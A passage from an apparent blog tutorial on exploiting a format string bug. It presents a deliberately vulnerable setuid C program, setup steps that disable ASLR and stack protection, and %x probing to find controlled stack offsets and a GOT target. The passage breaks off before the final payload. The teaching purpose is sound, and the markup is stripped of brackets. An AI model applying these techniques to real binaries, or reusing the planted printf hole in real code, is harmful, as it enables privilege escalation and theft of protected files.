dangerous to the system you are developing on, you risk crashing the system and even corrupting data, only do this on a development machine and if stuff breaks don't blame me for any damage done!/p pHappy Hacking :-)/p

Plain Format String Vulnerability

eXploit

By: 0xe7

20 May 2014 at 19:31

pThis is the second of a series of tutorials exploring how to detect and exploit stack based vulnerabilities on x86-32 Linux systems. The first can be found a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/" target="_blank"here/a./p pThis tutorial will involve detecting and exploiting a a href="https://en.wikipedia.org/wiki/Printf_format_string" target="_blank"format string/a a href="https://en.wikipedia.org/wiki/Uncontrolled_format_string" target="_blank"vulnerability/a. Format string vulnerabilities are sometimes easier to find than a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflows/a but nearly always harder to exploit which is why I decided to do this tutorital after the buffer overflow./p pA format string vulnerability happens when a programmer has passed a user controlled input as part of the first argument of a call to one of the a href="http://linux.die.net/man/3/printf" target="_blank"printf family/a of functions./p !-- more -- pAll of the code in this tutorial was written by the author./p h2The Vulnerable App/h2 pBelow is the source code of the vulnerable application that we will be attacking. It is written in C and it the same application that is attacked in the first part of this series./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThere are 2 lines in the above application that contain a format string vulnerability. The first is on line 18, it is part of the usage message and should be changed to codeprintf("%s", argv[0]);/code. The second, and the vulnerability that we will be attacking here, is on line 25, this should be changed to codeprintf("%s", argv[1]);/code./p h2Setting Up The Environment/h2 pThe environment setup is exactly the same as in part 1, so if you done part 1 then skip this section. This is how to setup the environment in full on a Debian based system:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser testuser/span span class="code-line"span class="go"Adding user `testuser#39; .../span/span span class="code-line"span class="go"Adding new group `testuser#39; (1001) .../span/span span class="code-line"span class="go"Adding new user `testuser#39; (1001) with group `testuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/testuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app app.c/span span class="code-line"span class="gp"root@dev:~# /spancp app /home/testuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space /span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"cd/span /home/testuser//span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod u+s app/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spansu - testuser/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l secret.txt /span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The App / Finding The Vulnerability/h2 pFor this application its very easy to find this vulnerability:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"testuser@dev:~$ ./app %/spanx/span span class="code-line"span class="go"Wrong password: bffff884/span/span span class="code-line"/code/pre/div /td/tr/table pWhat's happened here is we've instructed printf to get the first value off of the stack and print it in hex. From the output we have got its clear there is a format string vulnerability here. A properly coded application would give the following result:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ ./app %/spanx/span span class="code-line"span class="go"Wrong password: %x/span/span span class="code-line"/code/pre/div /td/tr/table h2Developing The Exploit/h2 pNow that we have discovered the vulnerability, we need to find a part of the stack that we control:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAA : %xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff874/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAA : %2\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff880/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAA : %3\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff7c8/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAA : %4\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : b7e8d7f5/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAA : %5\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : b7ff0590/span/span span class="code-line"/code/pre/div /td/tr/table pWe need to do this until we find 41414141 (AAAA in hex), this can take some time so I do a little shell-fu to make this less of a painful task:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="k"for/span i span class="k"in/span span class="sb"`/spanseq span class="m"1/span span class="m"500/spanspan class="sb"`/spanspan class="p";/span span class="k"do/span span class="nb"echo/span span class="s2"quot;./app \quot;AAAA : %/spanspan class="nv"$i/spanspan class="s2"\$x\quot;quot;/span gt;gt; /tmp/tspan class="p";/span ./app span class="s2"quot;AAAA : %/spanspan class="nv"$i/spanspan class="s2"\$xquot;/span gt;gt; /tmp/tspan class="p";/span span class="k"done/span/span span class="code-line"span class="gp"testuser@dev:~$ /spangrep -B span class="m"1/span span class="m"41414141/span /tmp/t/span span class="code-line"span class="gp"testuser@dev:~$ /spangrep -B span class="m"1/span span class="m"414141/span /tmp/t/span span class="code-line"span class="go"./app quot;AAAA : %123$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : 41414100/span/span span class="code-line"/code/pre/div /td/tr/table pSo we know roughly where we are going to land, this will change a bit as we go further but it will always be around here. Now to all these A's together in 4 bytes:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAAC : %123\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAAC : 41414141/span/span span class="code-line"/code/pre/div /td/tr/table pWe are going to need 2 addresses though (you will find out why later), so lets add some B's and find both of them:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAABBBBC : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC : 41007070 : 42414141/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAABBBBCC : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBCC : 41410070 : 42424141/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAABBBB : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB : 707061 : 41414141/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;AAAABBBB : %124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB : 41414141 : 42424242/span/span span class="code-line"/code/pre/div /td/tr/table pSo now we control 2 4 byte addresses (the positions still might change a little along the way but we will always need to correct this using methods like this). So far we have just used the code%x/code conversion specifier, most implementations also provide the code%n/code conversion specifier too. This is what is needed to actually write to memory locations using this vulnerability. code%n/code writes however many bytes has been printed so far to the address pointed to by the value on the stack, so with this knowledge and being able to control what addresses are at a certain point in memory, we should be able to run our own code. Still a little bit of work to do but we are getting there./p pNext we need figure out the memory address that we want to write to, for this we'll use the global offset table (GOT) (this is a table used to call functions from shared libraries, like printf, putchar, strlen..., it contains pointers to the functions and is writable on linux)./p pFirst let's look at the disassembly to see what function we need to write to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;putchar@pltgt;/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pYou could do a bit of debugging to figure out what call to codeprintf/code is vulnerable but I can tell you that it is on line 36 because it is the second call to codeprintf/code after the password is checked (the call to codecheckpass/code on line 26)./p pThere is a call to putchar after, on line 38, let's hijack this, so now to figure out where this record is in memory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanobjdump --dynamic-reloc ./app/span span class="code-line"/span span class="code-line"span class="go"./app: file format elf32-i386/span/span span class="code-line"/span span class="code-line"span 